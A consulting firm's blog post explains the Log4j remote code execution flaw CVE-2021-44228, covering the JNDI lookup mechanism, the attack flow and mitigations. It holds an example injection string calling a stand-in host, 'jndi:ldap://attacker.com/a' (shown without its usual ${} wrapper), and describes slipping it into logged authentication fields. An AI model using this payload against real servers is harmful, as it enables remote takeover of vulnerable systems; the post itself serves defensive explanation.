About Us

Citrus Consulting Services is the Consulting and the Transformation Services arm of Redington Gulf.

Sunday – Thursday: 9:00AM–6:00PM (Sales), Sunday – Saturday: 24×7 / 365 (Support) E.O#3, Ground Floor, Building 01 Dubai Internet City, P.O Box 501 761 Dubai, UAE (+971) 04 516 1500
(+966) 11 462 5323
info@citrusconsulting.com

Citrus Consulting Services

CVE-2021-44228

Introduction

December 09, 2021 observed series of attacks from Hackers, gaining easily remote control on the endpoints via unnoticed and undiscovered vulnerability.

A serious vulnerability “CVE-2021-44228” was found in open-source Apache log4j version 2 to version 2.14.

Log4j is used by developers to keep track of what happens in their software applications or online services.

 

 

Apache Log4j Vulnerability CVE-2021-44228

CVE-2021-44228 is a remote code execution (RCE) vulnerability in Log4j.

 

RCE is a cyber-attack where attacker can remotely execute commands on someone’s computer.

 

 

What makes Log4j Vulnerable?

Apache Log4j (version 2.0 – version 2.14.1) has JNDI features used in configuration and log parameters that don’t protect against attacker-controlled LDAP and other JNDI-related endpoints.

 

The Java Naming and Directory Interface is a Java API for a directory service that allows Java software clients to discover and lookup data and resources via a name.

 

 

Services that can be used to inject crafted request includes:

  • Lightweight Directory Access Protocol (LDAP)
  • Secure LDAP (LDAPS)
  • Remote Method Invocation (RMI)
  • Domain Name Service (DNS)

If the vulnerable server uses log4j to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server and may be able to gain remote access.

 

 

 

 

How it Works…

 

Pre-Requisite for the attack

  • Server with Apache Log4j (version 2.0 – version 2.14.1)
  • an endpoint with any protocol (HTTP, TCP, etc.,) that allows an attacker to send the exploit string
  • a log statement that logs out the string from the request

 

Flow of the attack in Simple words

  • Attacker sends a request to the vulnerable server via any protocol (HTTP, TCP, etc.,)
  • The server running Apache Log4j logs the data in the request
    • The request from the attacker contains malicious payload
  • The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via JNDI
  • This response contains a path to a remote Java class file which is then injected into the server process
  • The injected payload allows the attacker to get remote access to the vulnerable server

How Log4j Works

Log4J uses variable extrapolation to resolve correct value of a variable when logging. For example, if we use this following line in the code:

log.info(“I have ${dollar} dollars”)

Here, ${dollar} will be replaced by the value (example – 100) of the variable during log writing.

This is how it will look like:

log.info(“I have 100 dollars”)

 

Exploitation

Since Log4j does resolve variable, we can pass malicious strings which can execute a code and give us remote control over the system.

Sounds simple, but we have another challenge. We still need to authenticate first. This can be by passed by sending the malicious string while authenticating.

As per the working model of Log4j, even the authentications are logged.

THE STRING

What string needs to be passed to make all this work?

Let’s understand this with an example. First, assume below string is used to authenticate with the vulnerable server:

log.info(“User ${user.name} wants to authenticate via authentication API”)

Now, only thing we need to do here is pass the string “jndi:ldap://attacker.com/a”.

While logging log4j will do JNDI lookup to get the value of expression using JNDILookup Class. Thereafter, attacker will get a connection from secure environment to their fake domain “attacker.com” environment.

 

From here, the attacker can ask the log4j to download the code which leads to remote code execution, giving the remote control to the attacker.

 

Mitigation

Log4j 1.x mitigation

Audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.

 

Log4j 2.x mitigation

Implement one of the following mitigation techniques:

  • Java 8 (or later) users should upgrade to release 2.16.0.
  • Java 7 users should upgrade to release 2.12.2.
  • Otherwise, in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability

Bharat Jindal is an experienced senior consultant with expertise in network and information security domain both on-premise and cloud infrastructure. He is currently leading the security team at Citrus and delivering end to end security consulting services starting from solutions design to managed support services to clients across MEA on number of security solutions including but not limited to cloud Security, SIEM, Firewalls, PIM/PAM, EDR, IPS, IDS and others. He is also a passionate learner with 20+ certifications from leading enterprise security vendors including AWS Certified Security Specialty."

Post a Comment

1 + fifteen =